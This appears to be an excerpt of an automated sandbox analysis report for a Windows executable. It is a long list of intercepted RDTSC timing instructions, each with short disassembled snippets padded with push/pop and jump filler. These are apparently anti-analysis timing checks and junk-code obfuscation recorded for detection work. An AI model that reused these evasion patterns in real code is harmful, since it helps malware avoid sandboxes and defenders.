                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 14274B1 second address: 14274F7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F11F8F18C32h 0x00000009 popad 0x0000000a jnl 00007F11F8F18C39h 0x00000010 pop edx 0x00000011 pop eax 0x00000012 push ebx 0x00000013 jmp 00007F11F8F18C30h 0x00000018 push eax 0x00000019 push eax 0x0000001a push edx 0x0000001b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 14274F7 second address: 14274FD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 142BDC4 second address: 142BDD1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 popad 0x00000006 push eax 0x00000007 push edx 0x00000008 push edx 0x00000009 pushad 0x0000000a popad 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 142BDD1 second address: 142BDDA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 push eax 0x00000006 push edx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 142BDDA second address: 142BDDE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 142BDDE second address: 142BDE2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 142BDE2 second address: 142BDEE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jns 00007F11F8F18C26h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 142BDEE second address: 142BE05 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F11F8D51841h 0x00000009 pushad 0x0000000a popad 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 142C79A second address: 142C7A6 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 je 00007F11F8F18C26h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 142C7A6 second address: 142C7B1 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push edi 0x00000004 pop edi 0x00000005 pushad 0x00000006 popad 0x00000007 popad 0x00000008 pushad 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13B9920 second address: 13B9934 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F11F8F18C30h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13B9934 second address: 13B9948 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F11F8D5183Bh 0x00000008 push edi 0x00000009 pop edi 0x0000000a push edx 0x0000000b pop edx 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13FDA77 second address: 13FDA7B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13FDBB3 second address: 13FDBB7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13FE0A1 second address: 13FE0A7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13FE0A7 second address: 13FE0AB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13FE0AB second address: 13FE0CB instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F11F8F18C30h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c jnl 00007F11F8F18C30h 0x00000012 pushad 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13FE0CB second address: 13FE0E6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 popad 0x00000007 mov eax, dword ptr [esp+04h] 0x0000000b push ebx 0x0000000c push ebx 0x0000000d jo 00007F11F8D51836h 0x00000013 pop ebx 0x00000014 pop ebx 0x00000015 mov eax, dword ptr [eax] 0x00000017 push esi 0x00000018 pushad 0x00000019 push eax 0x0000001a push edx 0x0000001b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13FE0E6 second address: 13FE0EC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13FE0EC second address: 13FE142 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop esi 0x00000006 mov dword ptr [esp+04h], eax 0x0000000a jmp 00007F11F8D51840h 0x0000000f pop eax 0x00000010 mov dword ptr [ebp+124562A8h], eax 0x00000016 call 00007F11F8D51839h 0x0000001b pushad 0x0000001c jmp 00007F11F8D51840h 0x00000021 push eax 0x00000022 push edx 0x00000023 jmp 00007F11F8D51849h 0x00000028 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13FE142 second address: 13FE195 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push eax 0x00000008 jng 00007F11F8F18C34h 0x0000000e mov eax, dword ptr [esp+04h] 0x00000012 jmp 00007F11F8F18C33h 0x00000017 mov eax, dword ptr [eax] 0x00000019 push eax 0x0000001a push edx 0x0000001b jp 00007F11F8F18C3Ch 0x00000021 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13FE195 second address: 13FE1C0 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F11F8D5183Dh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov dword ptr [esp+04h], eax 0x0000000d push eax 0x0000000e push edx 0x0000000f jmp 00007F11F8D51844h 0x00000014 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13FE1C0 second address: 13FE1C6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push esi 0x00000005 pop esi 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13FE3F3 second address: 13FE3F9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13FE3F9 second address: 13FE3FD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13FE3FD second address: 13FE401 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13FE401 second address: 13FE44D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 jmp 00007F11F8F18C32h 0x0000000e mov eax, dword ptr [esp+04h] 0x00000012 pushad 0x00000013 jmp 00007F11F8F18C37h 0x00000018 jne 00007F11F8F18C2Ch 0x0000001e popad 0x0000001f mov eax, dword ptr [eax] 0x00000021 push eax 0x00000022 push edx 0x00000023 push eax 0x00000024 push edx 0x00000025 pushad 0x00000026 popad 0x00000027 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13FE44D second address: 13FE467 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F11F8D51846h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1430937 second address: 1430962 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 jnp 00007F11F8F18C26h 0x00000009 push edi 0x0000000a pop edi 0x0000000b pop edi 0x0000000c push eax 0x0000000d push edx 0x0000000e jng 00007F11F8F18C26h 0x00000014 jmp 00007F11F8F18C37h 0x00000019 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1430A9F second address: 1430AA7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 pushad 0x00000007 popad 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1430AA7 second address: 1430AC0 instructions: 0x00000000 rdtsc 0x00000002 jc 00007F11F8F18C26h 0x00000008 jbe 00007F11F8F18C26h 0x0000000e pop edx 0x0000000f pop eax 0x00000010 push esi 0x00000011 jc 00007F11F8F18C2Ch 0x00000017 push eax 0x00000018 push edx 0x00000019 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1430BF8 second address: 1430BFC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1430BFC second address: 1430C3F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F11F8F18C2Dh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 jc 00007F11F8F18C2Ch 0x0000000f jl 00007F11F8F18C26h 0x00000015 pop ebx 0x00000016 push edi 0x00000017 jmp 00007F11F8F18C2Ah 0x0000001c push eax 0x0000001d push edx 0x0000001e jp 00007F11F8F18C26h 0x00000024 jmp 00007F11F8F18C32h 0x00000029 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1435F43 second address: 1435F81 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F11F8D51847h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push edx 0x0000000a jnl 00007F11F8D5183Eh 0x00000010 push eax 0x00000011 push edx 0x00000012 jmp 00007F11F8D51842h 0x00000017 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1435F81 second address: 1435F85 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 143B6E4 second address: 143B6ED instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 push eax 0x00000006 push edx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 143B6ED second address: 143B6F7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jl 00007F11F8F18C26h 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 143A2B1 second address: 143A2BB instructions: 0x00000000 rdtsc 0x00000002 jp 00007F11F8D51836h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 143A6CF second address: 143A6DC instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push esi 0x00000004 pop esi 0x00000005 js 00007F11F8F18C26h 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 143A6DC second address: 143A6F9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pushad 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007F11F8D5183Bh 0x00000011 jno 00007F11F8D51836h 0x00000017 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 143A6F9 second address: 143A702 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push edx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 143A702 second address: 143A708 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 143A708 second address: 143A718 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pushad 0x00000006 push esi 0x00000007 pop esi 0x00000008 ja 00007F11F8F18C26h 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 143AB51 second address: 143AB78 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F11F8D51845h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 jne 00007F11F8D5183Eh 0x0000000f js 00007F11F8D51836h 0x00000015 pushad 0x00000016 popad 0x00000017 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 143AB78 second address: 143AB7D instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 143ACE0 second address: 143ACEE instructions: 0x00000000 rdtsc 0x00000002 jl 00007F11F8D51836h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 143ACEE second address: 143ACF2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 143ACF2 second address: 143ACF6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 143AFAC second address: 143AFB6 instructions: 0x00000000 rdtsc 0x00000002 jng 00007F11F8F18C26h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 143AFB6 second address: 143AFC5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 ja 00007F11F8D51836h 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1439E60 second address: 1439E81 instructions: 0x00000000 rdtsc 0x00000002 jno 00007F11F8F18C2Eh 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pushad 0x0000000b push eax 0x0000000c push edx 0x0000000d jne 00007F11F8F18C26h 0x00000013 jl 00007F11F8F18C26h 0x00000019 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1439E81 second address: 1439E8B instructions: 0x00000000 rdtsc 0x00000002 jo 00007F11F8D51836h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1439E8B second address: 1439E99 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 js 00007F11F8F18C2Eh 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 14406A5 second address: 14406C2 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F11F8D51847h 0x00000007 push eax 0x00000008 push edx 0x00000009 push ecx 0x0000000a pop ecx 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1443938 second address: 144393C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 144393C second address: 1443944 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1443944 second address: 144396F instructions: 0x00000000 rdtsc 0x00000002 ja 00007F11F8F18C3Dh 0x00000008 push eax 0x00000009 push edx 0x0000000a jmp 00007F11F8F18C2Ah 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 144396F second address: 1443973 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 14433B5 second address: 14433BB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 14433BB second address: 14433C9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 ja 00007F11F8D51836h 0x0000000a popad 0x0000000b push esi 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 144365D second address: 1443667 instructions: 0x00000000 rdtsc 0x00000002 js 00007F11F8F18C26h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1443667 second address: 1443687 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jmp 00007F11F8D51848h 0x0000000d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1446C98 second address: 1446C9D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1446E45 second address: 1446E4B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1446E4B second address: 1446E51 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1446E51 second address: 1446E5B instructions: 0x00000000 rdtsc 0x00000002 jng 00007F11F8D51842h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1446E5B second address: 1446E61 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1446E61 second address: 1446E68 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1446E68 second address: 1446E7C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F11F8F18C2Eh 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 144B074 second address: 144B086 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F11F8D5183Bh 0x00000009 pushad 0x0000000a popad 0x0000000b popad 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 144A7CF second address: 144A7E1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 push edi 0x00000007 pop edi 0x00000008 popad 0x00000009 pushad 0x0000000a jp 00007F11F8F18C26h 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 144A7E1 second address: 144A7E8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 144AAE9 second address: 144AAF9 instructions: 0x00000000 rdtsc 0x00000002 js 00007F11F8F18C26h 0x00000008 pushad 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f popad 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 144FE3A second address: 144FE40 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 144FE40 second address: 144FE60 instructions: 0x00000000 rdtsc 0x00000002 jl 00007F11F8F18C26h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a js 00007F11F8F18C3Ah 0x00000010 jmp 00007F11F8F18C2Eh 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 144FFCC second address: 144FFE3 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F11F8D51841h 0x00000007 push eax 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1450132 second address: 1450145 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 jnc 00007F11F8F18C2Ch 0x0000000d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1450145 second address: 145016B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push esi 0x00000004 pop esi 0x00000005 jmp 00007F11F8D51848h 0x0000000a pushad 0x0000000b popad 0x0000000c popad 0x0000000d pop edx 0x0000000e pop eax 0x0000000f pushad 0x00000010 push eax 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 14502F7 second address: 14502FD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 14508B1 second address: 14508B6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1458842 second address: 1458848 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1458848 second address: 145884E instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 145884E second address: 145887A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push esi 0x00000007 pushad 0x00000008 popad 0x00000009 pop esi 0x0000000a popad 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e jmp 00007F11F8F18C35h 0x00000013 jns 00007F11F8F18C26h 0x00000019 push edx 0x0000001a pop edx 0x0000001b popad 0x0000001c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1456A14 second address: 1456A1A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1456A1A second address: 1456A2D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 js 00007F11F8F18C26h 0x0000000d js 00007F11F8F18C26h 0x00000013 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1456A2D second address: 1456A31 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1456A31 second address: 1456A37 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1456BA8 second address: 1456BC6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 jmp 00007F11F8D5183Eh 0x0000000a push edi 0x0000000b pushad 0x0000000c popad 0x0000000d push esi 0x0000000e pop esi 0x0000000f pop edi 0x00000010 push eax 0x00000011 pushad 0x00000012 popad 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 145717B second address: 145717F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1458299 second address: 14582AA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F11F8D5183Ch 0x00000009 popad 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 145C5B0 second address: 145C5C5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jno 00007F11F8F18C26h 0x0000000a jng 00007F11F8F18C26h 0x00000010 popad 0x00000011 push eax 0x00000012 push edx 0x00000013 pushad 0x00000014 popad 0x00000015 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 145C5C5 second address: 145C5C9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 145C5C9 second address: 145C5D5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jne 00007F11F8F18C26h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 145CA04 second address: 145CA09 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 145CA09 second address: 145CA0E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 145CE26 second address: 145CE4C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 jns 00007F11F8D51836h 0x0000000c popad 0x0000000d jmp 00007F11F8D51844h 0x00000012 pushad 0x00000013 pushad 0x00000014 popad 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
